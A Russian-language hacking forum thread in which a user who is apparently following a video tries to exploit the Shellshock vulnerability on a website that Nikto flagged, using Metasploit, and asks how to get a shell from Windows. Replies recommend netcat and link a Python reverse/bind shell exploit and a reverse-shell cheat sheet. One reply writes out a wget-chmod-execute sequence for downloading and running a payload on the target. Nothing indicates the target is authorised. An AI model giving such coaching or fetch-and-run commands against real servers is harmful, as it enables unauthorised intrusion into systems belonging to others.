PDA

Просмотр полной версии : Ёбнутый но срочный вопрос


Sensoft
17.02.2018, 01:50
На 2:39 что он делает ?

У меня win через мету всё точно повторил и вроде как получилось но я линукс не юзаю

Я так понял он вызвал shell или типа того

Как это сделать на win ?

d1v
17.02.2018, 01:58
коннектится неткатом к хосту

https://1cloud.ru/help/windows/netcat-na-windows

Sensoft
17.02.2018, 01:59
d1v said:
↑ (https://antichat.live/posts/4185173/)
коннектится неткатом к хосту
https://1cloud.ru/help/windows/netcat-na-windows


спасибо

Sensoft
17.02.2018, 02:08
d1v said:
↑ (https://antichat.live/posts/4185173/)
коннектится неткатом к хосту
https://1cloud.ru/help/windows/netcat-na-windows


https://s8.hostingkartinok.com/uploads/images/2018/02/77cbef7622238f114a9b1af334263883.png

Получается касяк уже с эксплоитом или типа не так сделал на стадии метасплоита ?

тоже изначально nikto сканил там и показало возможность дыры по видео сделал так же только я на 2:14 сделал свой каталог как у меня в никте, вывод метосплоита такой же как и у него

altblitz
17.02.2018, 02:34
Sensoft said:
↑ (https://antichat.live/posts/4185178/)
https://s8.hostingkartinok.com/uploads/images/2018/02/77cbef7622238f114a9b1af334263883.png
Получается касяк уже с эксплоитом или типа не так сделал на стадии метасплоита ?
тоже изначально nikto сканил там и показало возможность дыры по видео сделал так же только я на 2:14 сделал свой каталог как у меня в никте, вывод метосплоита такой же как и у него


Получается, что нужно запускать сплойт в Command Prompt (Admin).

Sensoft
17.02.2018, 02:37
altblitz said:
↑ (https://antichat.live/posts/4185184/)
Получается, что нужно запускать сплойт в Command Prompt (
Admin
).


подробнее можно ?

Sensoft
17.02.2018, 02:44
altblitz said:
↑ (https://antichat.live/posts/4185184/)
Получается, что нужно запускать сплойт в Command Prompt (
Admin
).


какой смысл запускать cmd от админа ? это на метосплоит вообще не как не влияет

Sensoft
17.02.2018, 02:48
Code:
+ OSVDB-112004: /php: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
+ OSVDB-112004: /php: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ OSVDB-112004: /php4: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
+ OSVDB-112004: /php4: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ OSVDB-112004: /php5: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
+ OSVDB-112004: /php5: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ OSVDB-112004: /php-cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
+ OSVDB-112004: /php-cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ OSVDB-112004: /php.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
+ OSVDB-112004: /php.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ OSVDB-112004: /php.fcgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271). + OSVDB-112004: /php.fcgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278). + OSVDB-112004: /printenv: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271). + OSVDB-112004: /printenv: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278). + OSVDB-112004: /restore_config.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2 14-6271).

zifus
17.02.2018, 03:05
возьми шел на питоне

_https://www.exploit-db.com/exploits/34900/

Там есть и бинд и реверс..

Для таких вещей нужно пересаживаться на linux, и куча вопросов отпадет сама по себе.

А вообще если ты делал все как на видео, на сервере может быть просто не установлен nc

Sensoft
17.02.2018, 03:19
zifus said:
↑ (https://antichat.live/posts/4185195/)
А вообще если ты делал все как на видео, на сервере может быть просто не установлен nc


99% что этого нет )

nc получается обязано быть (

ну тогда всё тупик

VY_CMa
17.02.2018, 12:08
Sensoft said:
↑ (https://antichat.live/posts/4185196/)
99% что этого нет )
nc получается обязано быть (
ну тогда всё тупик


nc не обязано быть. Тебе дали ответ: используй интерпретаторы для бинда и реверса. На крайний случай можно и скачать что-то: wget http://file, chmod +x /tmp/file, /tmp/file

zifus
17.02.2018, 13:15
Sensoft said:
↑ (https://antichat.live/posts/4185196/)
ну тогда всё тупик


http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet